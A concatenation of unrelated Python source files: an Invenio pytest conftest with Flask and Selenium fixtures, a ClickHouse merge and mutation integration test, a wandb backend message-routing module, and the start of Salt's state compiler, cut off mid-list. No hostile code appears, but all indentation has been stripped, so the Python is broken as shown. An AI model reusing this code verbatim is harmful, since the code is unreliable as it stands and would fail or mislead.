#logger.setLevel(logging.DEBUG)
#logger.addHandler(logging.StreamHandler())
if __name__ == '__main__':
test_set_up()
unittest.main()
|
conftest.py
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Pytest configuration."""
import multiprocessing
import os
import shutil
import tempfile
import time
import pytest
from flask import Flask
from flask_babelex import Babel
from flask_mail import Mail
from flask_menu import Menu
from invenio_db import InvenioDB, db
from selenium import webdriver
from sqlalchemy_utils.functions import create_database, database_exists, \
drop_database
from invenio_accounts import InvenioAccounts
from invenio_accounts.views.settings import blueprint
@pytest.fixture(scope='session')
def app(request):
"""Flask application fixture for E2E/integration/selenium tests.
Overrides the `app` fixture found in `../conftest.py`. Tests/files in this
folder and subfolders will see this variant of the `app` fixture.
"""
instance_path = tempfile.mkdtemp()
app = Flask('testapp', instance_path=instance_path)
app.config.update(
ACCOUNTS_USE_CELERY=False,
CELERY_ALWAYS_EAGER=True,
CELERY_CACHE_BACKEND="memory",
CELERY_EAGER_PROPAGATES_EXCEPTIONS=True,
CELERY_RESULT_BACKEND="cache",
LOGIN_DISABLED=False,
MAIL_SUPPRESS_SEND=True,
SECRET_KEY="CHANGE_ME",
SECURITY_PASSWORD_SALT="CHANGE_ME_ALSO",
SQLALCHEMY_DATABASE_URI=os.environ.get(
'SQLALCHEMY_DATABASE_URI', 'sqlite:///test.db'),
TESTING=True,
)
Menu(app)
Babel(app)
Mail(app)
InvenioDB(app)
InvenioAccounts(app)
app.register_blueprint(blueprint)
with app.app_context():
if not database_exists(str(db.engine.url)):
create_database(str(db.engine.url))
db.create_all()
def teardown():
with app.app_context():
drop_database(str(db.engine.url))
shutil.rmtree(instance_path)
request.addfinalizer(teardown)
return app
def pytest_generate_tests(metafunc):
"""Override pytest's default test collection function.
For each test in this directory which uses the `env_browser` fixture, said
test is called once for each value found in the `E2E_WEBDRIVER_BROWSERS`
environment variable.
"""
browsers = os.environ.get('E2E_WEBDRIVER_BROWSERS', '').split()
if not browsers:
pytest.skip('E2E_WEBDRIVER_BROWSERS not set, '
'end-to-end tests skipped.')
if 'env_browser' in metafunc.fixturenames:
# In Python 2.7 the fallback kwarg of os.environ.get is `failobj`,
# in 3.x it's `default`.
metafunc.parametrize('env_browser', browsers, indirect=True)
@pytest.fixture()
def env_browser(request):
"""Create a webdriver instance of the browser specified by request.
The default browser is Firefox. The webdriver instance is killed after the
number of seconds specified by the ``E2E_WEBDRIVER_TIMEOUT`` variable,
which defaults to 300 (five minutes).
"""
timeout = int(os.environ.get('E2E_WEBDRIVER_TIMEOUT', 300))
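# Watchdog: a separate process quits the browser if a test hangs past the timeout.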
def wait_kill():
time.sleep(timeout)
browser.quit()
def finalizer():
browser.quit()
timeout_process.terminate()
timeout_process = multiprocessing.Process(target=wait_kill)
# Create instance of webdriver.`request.param`()
browser = getattr(webdriver, request.param)()
# Add finalizer to quit the webdriver instance
request.addfinalizer(finalizer)
timeout_process.start()
return browser
|
test.py
|
import pytest
import threading
import time
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 1} )
node2 = cluster.add_instance('node2',
config_dir='configs',
main_configs=['configs/logs_config.xml'],
with_zookeeper=True,
macros={"shard": 0, "replica": 2} )
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def split_tsv(data):
return [ x.split("\t") for x in data.splitlines() ]
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_merge_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
name = "test_merge_simple"
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_merge_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
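# Block numbers start from 0 for Replicated tables and from 1 for plain MergeTree,
# hence the different expected part names; ORDER BY sleep(2) in the table definition
# slows the merge so it is still visible in system.merges when queried below.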
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY sleep(2)
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
node1.query("INSERT INTO {name} VALUES (2)".format(name=name))
node1.query("INSERT INTO {name} VALUES (3)".format(name=name))
parts = ["all_{}_{}_0".format(x, x) for x in range(starting_block, starting_block+3)]
result_part = "all_{}_{}_1".format(starting_block, starting_block+2)
def optimize():
node1.query("OPTIMIZE TABLE {name}".format(name=name))
wait = threading.Thread(target=time.sleep, args=(5,))
wait.start()
t = threading.Thread(target=optimize)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=name))) == [
[
"default",
name,
"3",
"['{}','{}','{}']".format(*parts),
"['{clickhouse}/data/default/{name}/{}/','{clickhouse}/data/default/{name}/{}/','{clickhouse}/data/default/{name}/{}/']".format(*parts, clickhouse=clickhouse_path, name=name),
result_part,
"{clickhouse}/data/default/{name}/{}/".format(result_part, clickhouse=clickhouse_path, name=name),
"all",
"0"
]
]
t.join()
wait.join()
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
@pytest.mark.parametrize("replicated", [
"",
"replicated"
])
def test_mutation_simple(started_cluster, replicated):
try:
clickhouse_path = "/var/lib/clickhouse"
name = "test_mutation_simple"
nodes = [node1, node2] if replicated else [node1]
engine = "ReplicatedMergeTree('/clickhouse/test_mutation_simple', '{replica}')" if replicated else "MergeTree()"
node_check = nodes[-1]
starting_block = 0 if replicated else 1
for node in nodes:
node.query("""
CREATE TABLE {name}
(
`a` Int64
)
ENGINE = {engine}
ORDER BY tuple()
""".format(engine=engine, name=name))
node1.query("INSERT INTO {name} VALUES (1)".format(name=name))
part = "all_{}_{}_0".format(starting_block, starting_block)
result_part = "all_{}_{}_0_{}".format(starting_block, starting_block, starting_block+1)
def alter():
node1.query("ALTER TABLE {name} UPDATE a = 42 WHERE sleep(2) OR 1".format(name=name))
t = threading.Thread(target=alter)
t.start()
time.sleep(1)
assert split_tsv(node_check.query("""
SELECT database, table, num_parts, source_part_names, source_part_paths, result_part_name, result_part_path, partition_id, is_mutation
FROM system.merges
WHERE table = '{name}'
""".format(name=name))) == [
[
"default",
name,
"1",
"['{}']".format(part),
"['{clickhouse}/data/default/{name}/{}/']".format(part, clickhouse=clickhouse_path, name=name),
result_part,
"{clickhouse}/data/default/{name}/{}/".format(result_part, clickhouse=clickhouse_path, name=name),
"all",
"1"
],
]
t.join()
time.sleep(1.5)
assert node_check.query("SELECT * FROM system.merges WHERE table = '{name}'".format(name=name)) == ""
finally:
for node in nodes:
node.query("DROP TABLE {name}".format(name=name))
|
interface.py
|
#
# -*- coding: utf-8 -*-
"""Backend Sender - Send to internal process
Manage backend sender.
"""
import json
import logging
import threading
import uuid
import six
from six.moves import queue
import wandb
from wandb import data_types
from wandb.proto import wandb_internal_pb2 as pb
from wandb.proto import wandb_telemetry_pb2 as tpb
from wandb.util import (
get_h5_typename,
json_dumps_safer,
json_dumps_safer_history,
json_friendly,
json_friendly_val,
maybe_compress_summary,
WandBJSONEncoderOld,
)
from .artifacts import ArtifactManifest
from ..wandb_artifacts import Artifact
if wandb.TYPE_CHECKING:
import typing as t
from . import summary_record as sr
from typing import Any, Dict, Iterable, Optional, Tuple, Union
from multiprocessing import Process
from typing import cast
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from ..wandb_run import Run
from six.moves.queue import Queue
else:
def cast(_, val):
return val
logger = logging.getLogger("wandb")
def file_policy_to_enum(policy: str) -> "pb.FilesItem.PolicyTypeValue":
if policy == "now":
enum = pb.FilesItem.PolicyType.NOW
elif policy == "end":
enum = pb.FilesItem.PolicyType.END
elif policy == "live":
enum = pb.FilesItem.PolicyType.LIVE
return enum
def file_enum_to_policy(enum: "pb.FilesItem.PolicyTypeValue") -> str:
if enum == pb.FilesItem.PolicyType.NOW:
policy = "now"
elif enum == pb.FilesItem.PolicyType.END:
policy = "end"
elif enum == pb.FilesItem.PolicyType.LIVE:
policy = "live"
return policy
class _Future(object):
_object: Optional[pb.Result]
def __init__(self) -> None:
self._object = None
self._object_ready = threading.Event()
self._lock = threading.Lock()
def get(self, timeout: int = None) -> Optional[pb.Result]:
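# Block until the matching response arrives or the timeout expires; returns None on timeout.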
is_set = self._object_ready.wait(timeout)
if is_set and self._object:
return self._object
return None
def _set_object(self, obj: pb.Result) -> None:
self._object = obj
self._object_ready.set()
class MessageRouter(object):
_pending_reqs: Dict[str, _Future]
_request_queue: "Queue[pb.Record]"
_response_queue: "Queue[pb.Result]"
def __init__(
self, request_queue: "Queue[pb.Record]", response_queue: "Queue[pb.Result]"
) -> None:
self._request_queue = request_queue
self._response_queue = response_queue
self._pending_reqs = {}
self._lock = threading.Lock()
self._join_event = threading.Event()
self._thread = threading.Thread(target=self.message_loop)
self._thread.daemon = True
self._thread.start()
def message_loop(self) -> None:
while not self._join_event.is_set():
try:
msg = self._response_queue.get(timeout=1)
except queue.Empty:
continue
self._handle_msg_rcv(msg)
def send_and_receive(self, rec: pb.Record, local: Optional[bool] = None) -> _Future:
rec.control.req_resp = True
if local:
rec.control.local = local
rec.uuid = uuid.uuid4().hex
future = _Future()
with self._lock:
self._pending_reqs[rec.uuid] = future
self._request_queue.put(rec)
return future
def join(self) -> None:
self._join_event.set()
self._thread.join()
def _handle_msg_rcv(self, msg: pb.Result) -> None:
with self._lock:
future = self._pending_reqs.pop(msg.uuid, None)
if future is None:
# TODO (cvp): saw this in tests, seemed benign enough to ignore, but
# could point to other issues.
if msg.uuid != "":
logger.warning(
"No listener found for msg with uuid %s (%s)", msg.uuid, msg
)
return
future._set_object(msg)
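# A minimal usage sketch (assumed wiring; in this module the router is normally
# constructed by BackendSender below with queues shared with the internal process):
#
#   request_q = queue.Queue()   # carries pb.Record requests
#   response_q = queue.Queue()  # carries pb.Result responses
#   router = MessageRouter(request_q, response_q)
#   fut = router.send_and_receive(pb.Record())  # returns a _Future immediately
#   result = fut.get(timeout=5)                 # None if no response arrives in time
#   router.join()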
class BackendSender(object):
class ExceptionTimeout(Exception):
pass
record_q: Optional["Queue[pb.Record]"]
result_q: Optional["Queue[pb.Result]"]
process: Optional[Process]
_run: Optional["Run"]
_router: Optional[MessageRouter]
def __init__(
self,
record_q: "Queue[pb.Record]" = None,
result_q: "Queue[pb.Result]" = None,
process: Process = None,
) -> None:
self.record_q = record_q
self.result_q = result_q
self._process = process
self._run = None
self._router = None
if record_q and result_q:
self._router = MessageRouter(record_q, result_q)
def _hack_set_run(self, run: "Run") -> None:
self._run = run
def publish_output(self, name: str, data: str) -> None:
# from vendor.protobuf import google3.protobuf.timestamp
# ts = timestamp.Timestamp()
# ts.GetCurrentTime()
# now = datetime.now()
if name == "stdout":
otype = pb.OutputRecord.OutputType.STDOUT
elif name == "stderr":
otype = pb.OutputRecord.OutputType.STDERR
        else:
            # TODO(jhr): throw error?
            print("unknown type")
            return
o = pb.OutputRecord(output_type=otype, line=data)
o.timestamp.GetCurrentTime()
self._publish_output(o)
def _publish_output(self, outdata: pb.OutputRecord) -> None:
rec = pb.Record()
rec.output.CopyFrom(outdata)
self._publish(rec)
def publish_tbdata(
self, log_dir: str, save: bool, root_logdir: Optional[str]
) -> None:
tbrecord = pb.TBRecord()
tbrecord.log_dir = log_dir
tbrecord.save = save
tbrecord.root_dir = root_logdir or ""
rec = self._make_record(tbrecord=tbrecord)
self._publish(rec)
def _publish_history(self, history: pb.HistoryRecord) -> None:
rec = self._make_record(history=history)
self._publish(rec)
def publish_history(
self, data: dict, step: int = None, run: "Run" = None, publish_step: bool = True
) -> None:
run = run or self._run
data = data_types.history_dict_to_json(run, data, step=step)
history = pb.HistoryRecord()
if publish_step:
assert step is not None
history.step.num = step
data.pop("_step", None)
for k, v in six.iteritems(data):
item = history.item.add()
item.key = k
item.value_json = json_dumps_safer_history(v) # type: ignore
self._publish_history(history)
def publish_telemetry(self, telem: tpb.TelemetryRecord) -> None:
rec = self._make_record(telemetry=telem)
self._publish(rec)
def _make_run(self, run: "Run") -> pb.RunRecord:
proto_run = pb.RunRecord()
run._make_proto_run(proto_run)
if run._settings.host:
proto_run.host = run._settings.host
if run._config is not None:
config_dict = run._config._as_dict() # type: ignore
self._make_config(data=config_dict, obj=proto_run.config)
if run._telemetry_obj:
proto_run.telemetry.MergeFrom(run._telemetry_obj)
return proto_run
def _make_artifact(self, artifact: Artifact) -> pb.ArtifactRecord:
proto_artifact = pb.ArtifactRecord()
proto_artifact.type = artifact.type
proto_artifact.name = artifact.name
proto_artifact.digest = artifact.digest
if artifact.distributed_id:
proto_artifact.distributed_id = artifact.distributed_id
if artifact.description:
proto_artifact.description = artifact.description
if artifact.metadata:
proto_artifact.metadata = json.dumps(json_friendly_val(artifact.metadata)) # type: ignore
proto_artifact.incremental_beta1 = artifact.incremental
self._make_artifact_manifest(artifact.manifest, obj=proto_artifact.manifest)
return proto_artifact
def _make_artifact_manifest(
self, artifact_manifest: ArtifactManifest, obj: pb.ArtifactManifest = None
) -> pb.ArtifactManifest:
proto_manifest = obj or pb.ArtifactManifest()
proto_manifest.version = artifact_manifest.version() # type: ignore
proto_manifest.storage_policy = artifact_manifest.storage_policy.name()
for k, v in artifact_manifest.storage_policy.config().items() or {}.items():
cfg = proto_manifest.storage_policy_config.add()
cfg.key = k
cfg.value_json = json.dumps(v)
for entry in sorted(artifact_manifest.entries.values(), key=lambda k: k.path): # type: ignore
proto_entry = proto_manifest.contents.add()
proto_entry.path = entry.path
proto_entry.digest = entry.digest
if entry.size:
proto_entry.size = entry.size
if entry.birth_artifact_id:
proto_entry.birth_artifact_id = entry.birth_artifact_id
if entry.ref:
proto_entry.ref = entry.ref
if entry.local_path:
proto_entry.local_path = entry.local_path
for k, v in entry.extra.items():
proto_extra = proto_entry.extra.add()
proto_extra.key = k
proto_extra.value_json = json.dumps(v)
return proto_manifest
def _make_exit(self, exit_code: int) -> pb.RunExitRecord:
exit = pb.RunExitRecord()
exit.exit_code = exit_code
return exit
def _make_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
obj: pb.ConfigRecord = None,
) -> pb.ConfigRecord:
config = obj or pb.ConfigRecord()
if data:
for k, v in six.iteritems(data):
update = config.update.add()
update.key = k
update.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
if key:
update = config.update.add()
if isinstance(key, tuple):
for k in key:
update.nested_key.append(k)
else:
update.key = key
update.value_json = json_dumps_safer(json_friendly(val)[0]) # type: ignore
return config
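    # Illustrative examples (values assumed): _make_config(data={"lr": 0.01})
    # produces one update with key "lr" and value_json "0.01", while
    # _make_config(key=("optimizer", "name"), val="adam") fills nested_key
    # ["optimizer", "name"] instead of key.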
def _make_stats(self, stats_dict: dict) -> pb.StatsRecord:
stats = pb.StatsRecord()
stats.stats_type = pb.StatsRecord.StatsType.SYSTEM
stats.timestamp.GetCurrentTime()
for k, v in six.iteritems(stats_dict):
item = stats.item.add()
item.key = k
item.value_json = json_dumps_safer(json_friendly(v)[0]) # type: ignore
return stats
def _summary_encode(self, value: t.Any, path_from_root: str) -> dict:
"""Normalize, compress, and encode sub-objects for backend storage.
value: Object to encode.
path_from_root: `str` dot separated string from the top-level summary to the
current `value`.
Returns:
            A new tree of dicts with large objects replaced with dictionaries
with "_type" entries that say which type the original data was.
"""
# Constructs a new `dict` tree in `json_value` that discards and/or
# encodes objects that aren't JSON serializable.
if isinstance(value, dict):
json_value = {}
for key, value in six.iteritems(value):
json_value[key] = self._summary_encode(
value, path_from_root + "." + key
)
return json_value
else:
friendly_value, converted = json_friendly( # type: ignore
data_types.val_to_json(
self._run, path_from_root, value, namespace="summary"
)
)
json_value, compressed = maybe_compress_summary( # type: ignore
friendly_value, get_h5_typename(value) # type: ignore
)
if compressed:
                # TODO(jhr): implement me
pass
# self.write_h5(path_from_root, friendly_value)
return json_value
def _make_summary_from_dict(self, summary_dict: dict) -> pb.SummaryRecord:
summary = pb.SummaryRecord()
for k, v in six.iteritems(summary_dict):
update = summary.update.add()
update.key = k
update.value_json = json.dumps(v)
return summary
def _make_summary(self, summary_record: sr.SummaryRecord) -> pb.SummaryRecord:
pb_summary_record = pb.SummaryRecord()
for item in summary_record.update:
pb_summary_item = pb_summary_record.update.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
path_from_root = ".".join(item.key)
json_value = self._summary_encode(item.value, path_from_root)
json_value, _ = json_friendly(json_value) # type: ignore
pb_summary_item.value_json = json.dumps(
json_value, cls=WandBJSONEncoderOld,
)
for item in summary_record.remove:
pb_summary_item = pb_summary_record.remove.add()
key_length = len(item.key)
assert key_length > 0
if key_length > 1:
pb_summary_item.nested_key.extend(item.key)
else:
pb_summary_item.key = item.key[0]
return pb_summary_record
def _make_files(self, files_dict: dict) -> pb.FilesRecord:
files = pb.FilesRecord()
for path, policy in files_dict["files"]:
f = files.files.add()
f.path = path
f.policy = file_policy_to_enum(policy)
return files
def _make_login(self, api_key: str = None) -> pb.LoginRequest:
login = pb.LoginRequest()
if api_key:
login.api_key = api_key
return login
def _make_request(
self,
login: pb.LoginRequest = None,
get_summary: pb.GetSummaryRequest = None,
pause: pb.PauseRequest = None,
resume: pb.ResumeRequest = None,
stop_status: pb.StopStatusRequest = None,
network_status: pb.NetworkStatusRequest = None,
poll_exit: pb.PollExitRequest = None,
sampled_history: pb.SampledHistoryRequest = None,
run_start: pb.RunStartRequest = None,
check_version: pb.CheckVersionRequest = None,
log_artifact: pb.LogArtifactRequest = None,
defer: pb.DeferRequest = None,
) -> pb.Record:
request = pb.Request()
if login:
request.login.CopyFrom(login)
elif get_summary:
request.get_summary.CopyFrom(get_summary)
elif pause:
request.pause.CopyFrom(pause)
elif resume:
request.resume.CopyFrom(resume)
elif stop_status:
request.stop_status.CopyFrom(stop_status)
elif network_status:
request.network_status.CopyFrom(network_status)
elif poll_exit:
request.poll_exit.CopyFrom(poll_exit)
elif sampled_history:
request.sampled_history.CopyFrom(sampled_history)
elif run_start:
request.run_start.CopyFrom(run_start)
elif check_version:
request.check_version.CopyFrom(check_version)
elif log_artifact:
request.log_artifact.CopyFrom(log_artifact)
elif defer:
request.defer.CopyFrom(defer)
else:
raise Exception("Invalid request")
record = self._make_record(request=request)
        # Requests are not persisted
record.control.local = True
return record
def _make_record(
self,
run: pb.RunRecord = None,
config: pb.ConfigRecord = None,
files: pb.FilesRecord = None,
summary: pb.SummaryRecord = None,
history: pb.HistoryRecord = None,
stats: pb.StatsRecord = None,
exit: pb.RunExitRecord = None,
artifact: pb.ArtifactRecord = None,
tbrecord: pb.TBRecord = None,
alert: pb.AlertRecord = None,
final: pb.FinalRecord = None,
metric: pb.MetricRecord = None,
header: pb.HeaderRecord = None,
footer: pb.FooterRecord = None,
request: pb.Request = None,
telemetry: tpb.TelemetryRecord = None,
) -> pb.Record:
record = pb.Record()
if run:
record.run.CopyFrom(run)
elif config:
record.config.CopyFrom(config)
elif summary:
record.summary.CopyFrom(summary)
elif history:
record.history.CopyFrom(history)
elif files:
record.files.CopyFrom(files)
elif stats:
record.stats.CopyFrom(stats)
elif exit:
record.exit.CopyFrom(exit)
elif artifact:
record.artifact.CopyFrom(artifact)
elif tbrecord:
record.tbrecord.CopyFrom(tbrecord)
elif alert:
record.alert.CopyFrom(alert)
elif final:
record.final.CopyFrom(final)
elif header:
record.header.CopyFrom(header)
elif footer:
record.footer.CopyFrom(footer)
elif request:
record.request.CopyFrom(request)
elif telemetry:
record.telemetry.CopyFrom(telemetry)
elif metric:
record.metric.CopyFrom(metric)
else:
raise Exception("Invalid record")
return record
def _publish(self, record: pb.Record, local: bool = None) -> None:
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
if local:
record.control.local = local
if self.record_q:
self.record_q.put(record)
def _communicate(
self, rec: pb.Record, timeout: Optional[int] = 5, local: bool = None
) -> Optional[pb.Result]:
return self._communicate_async(rec, local=local).get(timeout=timeout)
def _communicate_async(self, rec: pb.Record, local: bool = None) -> _Future:
assert self._router
if self._process and not self._process.is_alive():
raise Exception("The wandb backend process has shutdown")
future = self._router.send_and_receive(rec, local=local)
return future
def communicate_login(
self, api_key: str = None, timeout: Optional[int] = 15
) -> pb.LoginResponse:
login = self._make_login(api_key)
rec = self._make_request(login=login)
result = self._communicate(rec, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
login_response = result.response.login_response
assert login_response
return login_response
def _publish_defer(self, state: "pb.DeferRequest.DeferStateValue") -> None:
defer = pb.DeferRequest(state=state)
rec = self._make_request(defer=defer)
self._publish(rec, local=True)
def publish_defer(self, state: int = 0) -> None:
self._publish_defer(cast("pb.DeferRequest.DeferStateValue", state))
def publish_header(self) -> None:
header = pb.HeaderRecord()
rec = self._make_record(header=header)
self._publish(rec)
def publish_footer(self) -> None:
footer = pb.FooterRecord()
rec = self._make_record(footer=footer)
self._publish(rec)
def publish_final(self) -> None:
final = pb.FinalRecord()
rec = self._make_record(final=final)
self._publish(rec)
def publish_login(self, api_key: str = None) -> None:
login = self._make_login(api_key)
rec = self._make_request(login=login)
self._publish(rec)
def publish_pause(self) -> None:
pause = pb.PauseRequest()
rec = self._make_request(pause=pause)
self._publish(rec)
def publish_resume(self) -> None:
resume = pb.ResumeRequest()
rec = self._make_request(resume=resume)
self._publish(rec)
def _publish_run(self, run: pb.RunRecord) -> None:
rec = self._make_record(run=run)
self._publish(rec)
def publish_run(self, run_obj: "Run") -> None:
run = self._make_run(run_obj)
self._publish_run(run)
def publish_config(
self,
data: dict = None,
key: Union[Tuple[str, ...], str] = None,
val: Any = None,
) -> None:
cfg = self._make_config(data=data, key=key, val=val)
self._publish_config(cfg)
def _publish_config(self, cfg: pb.ConfigRecord) -> None:
rec = self._make_record(config=cfg)
self._publish(rec)
def publish_summary(self, summary_record: sr.SummaryRecord) -> None:
pb_summary_record = self._make_summary(summary_record)
self._publish_summary(pb_summary_record)
def _publish_summary(self, summary: pb.SummaryRecord) -> None:
rec = self._make_record(summary=summary)
self._publish(rec)
def _publish_metric(self, metric: pb.MetricRecord) -> None:
rec = self._make_record(metric=metric)
self._publish(rec)
def _communicate_run(
self, run: pb.RunRecord, timeout: int = None
) -> Optional[pb.RunUpdateResult]:
"""Send synchronous run object waiting for a response.
Arguments:
run: RunRecord object
timeout: number of seconds to wait
        Returns:
            RunUpdateResult object, or None if the backend does not respond
"""
req = self._make_record(run=run)
resp = self._communicate(req, timeout=timeout)
if resp is None:
logger.info("couldn't get run from backend")
# Note: timeouts handled by callers: wandb_init.py
return None
assert resp.HasField("run_result")
return resp.run_result
def communicate_run(
self, run_obj: "Run", timeout: int = None
) -> Optional[pb.RunUpdateResult]:
run = self._make_run(run_obj)
return self._communicate_run(run, timeout=timeout)
def publish_stats(self, stats_dict: dict) -> None:
stats = self._make_stats(stats_dict)
rec = self._make_record(stats=stats)
self._publish(rec)
def publish_files(self, files_dict: dict) -> None:
files = self._make_files(files_dict)
rec = self._make_record(files=files)
self._publish(rec)
def communicate_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> _Future:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
log_artifact = pb.LogArtifactRequest()
log_artifact.artifact.CopyFrom(proto_artifact)
rec = self._make_request(log_artifact=log_artifact)
return self._communicate_async(rec)
def publish_artifact(
self,
run: "Run",
artifact: Artifact,
aliases: Iterable[str],
is_user_created: bool = False,
use_after_commit: bool = False,
finalize: bool = True,
) -> None:
proto_run = self._make_run(run)
proto_artifact = self._make_artifact(artifact)
proto_artifact.run_id = proto_run.run_id
proto_artifact.project = proto_run.project
proto_artifact.entity = proto_run.entity
proto_artifact.user_created = is_user_created
proto_artifact.use_after_commit = use_after_commit
proto_artifact.finalize = finalize
for alias in aliases:
proto_artifact.aliases.append(alias)
rec = self._make_record(artifact=proto_artifact)
self._publish(rec)
def publish_alert(
self, title: str, text: str, level: str, wait_duration: int
) -> None:
proto_alert = pb.AlertRecord()
proto_alert.title = title
proto_alert.text = text
proto_alert.level = level
proto_alert.wait_duration = wait_duration
rec = self._make_record(alert=proto_alert)
self._publish(rec)
def communicate_stop_status(
self, timeout: int = None
) -> Optional[pb.StopStatusResponse]:
status = pb.StopStatusRequest()
req = self._make_request(stop_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.stop_status_response
return resp.response.stop_status_response
def communicate_network_status(
self, timeout: int = None
) -> Optional[pb.NetworkStatusResponse]:
status = pb.NetworkStatusRequest()
req = self._make_request(network_status=status)
resp = self._communicate(req, timeout=timeout, local=True)
if resp is None:
return None
assert resp.response.network_status_response
return resp.response.network_status_response
def publish_exit(self, exit_code: int) -> None:
exit_data = self._make_exit(exit_code)
rec = self._make_record(exit=exit_data)
self._publish(rec)
def _communicate_exit(
self, exit_data: pb.RunExitRecord, timeout: int = None
) -> pb.RunExitResult:
req = self._make_record(exit=exit_data)
result = self._communicate(req, timeout=timeout)
if result is None:
# TODO: friendlier error message here
raise wandb.Error(
"Couldn't communicate with backend after %s seconds" % timeout
)
assert result.exit_result
return result.exit_result
def communicate_poll_exit(self) -> Optional[pb.PollExitResponse]:
poll_request = pb.PollExitRequest()
rec = self._make_request(poll_exit=poll_request)
result = self._communicate(rec)
if result is None:
return None
poll_exit_response = result.response.poll_exit_response
assert poll_exit_response
return poll_exit_response
def communicate_check_version(
self, current_version: str = None
) -> Optional[pb.CheckVersionResponse]:
check_version = pb.CheckVersionRequest()
if current_version:
check_version.current_version = current_version
rec = self._make_request(check_version=check_version)
result = self._communicate(rec)
if result is None:
# Note: timeouts handled by callers: wandb_init.py
return None
return result.response.check_version_response
def communicate_run_start(self, run_pb: pb.RunRecord) -> Optional[pb.Result]:
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(run_pb)
rec = self._make_request(run_start=run_start)
result = self._communicate(rec)
return result
def communicate_exit(self, exit_code: int, timeout: int = None) -> pb.RunExitResult:
exit_data = self._make_exit(exit_code)
return self._communicate_exit(exit_data, timeout=timeout)
def communicate_summary(self) -> Optional[pb.GetSummaryResponse]:
record = self._make_request(get_summary=pb.GetSummaryRequest())
result = self._communicate(record, timeout=10)
if result is None:
return None
get_summary_response = result.response.get_summary_response
assert get_summary_response
return get_summary_response
def communicate_sampled_history(self) -> Optional[pb.SampledHistoryResponse]:
record = self._make_request(sampled_history=pb.SampledHistoryRequest())
result = self._communicate(record)
if result is None:
return None
sampled_history_response = result.response.sampled_history_response
assert sampled_history_response
return sampled_history_response
def join(self) -> None:
# shutdown
request = pb.Request(shutdown=pb.ShutdownRequest())
record = self._make_record(request=request)
_ = self._communicate(record)
if self._router:
self._router.join()
|
state.py
|
"""
The State Compiler is used to execute states in Salt. A state is unlike
an execution module in that instead of just executing a command, it
ensures that a certain state is present on the system.
The data sent to the state calls is as follows:
{ 'state': '<state module name>',
'fun': '<state function name>',
      'name': '<the name argument passed to all states>',
'argn': '<arbitrary argument, can have many of these>'
}
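
For example, a pkg.installed state named "vim" with a version argument would
arrive as a low chunk like (illustrative values):
    { 'state': 'pkg', 'fun': 'installed', 'name': 'vim', 'version': '8.2' }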
"""
import copy
import datetime
import fnmatch
import logging
import os
import random
import re
import site
import sys
import time
import traceback
import salt.fileclient
import salt.loader
import salt.minion
import salt.pillar
import salt.syspaths as syspaths
import salt.transport.client
import salt.utils.args
import salt.utils.crypt
import salt.utils.data
import salt.utils.decorators.state
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.immutabletypes as immutabletypes
import salt.utils.msgpack
import salt.utils.platform
import salt.utils.process
import salt.utils.url
# Explicit late import to avoid circular import. DO NOT MOVE THIS.
import salt.utils.yamlloader as yamlloader
from salt.exceptions import CommandExecutionError, SaltRenderError, SaltReqTimeoutError
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext.six.moves import map, range, reload_module
from salt.serializers.msgpack import deserialize as msgpack_deserialize
from salt.serializers.msgpack import serialize as msgpack_serialize
from salt.template import compile_template, compile_template_str
from salt.utils.odict import DefaultOrderedDict, OrderedDict
# pylint: enable=import-error,no-name-in-module,redefined-builtin
log = logging.getLogger(__name__)
# These are keywords passed to state module functions which are used by salt
# itself in this module and are not passed on to the actual state module function
STATE_REQUISITE_KEYWORDS = frozenset(
[
"onchanges",
"onchanges_any",
"onfail",
"onfail_any",
"onfail_all",
"onfail_stop",
"prereq",
"prerequired",
"watch",
"watch_any",
"require",
"require_any",
"listen",
]
)
STATE_REQUISITE_IN_KEYWORDS = frozenset(
["onchanges_in", "onfail_in", "prereq_in", "watch_in", "require_in", "listen_in"]
)
STATE_RUNTIME_KEYWORDS = frozenset(
[
"fun",
"state",
"check_cmd",
"failhard",
"onlyif",
"unless",
"creates",
"retry",
"order",
"parallel",
"prereq",
"prereq_in",
"prerequired",
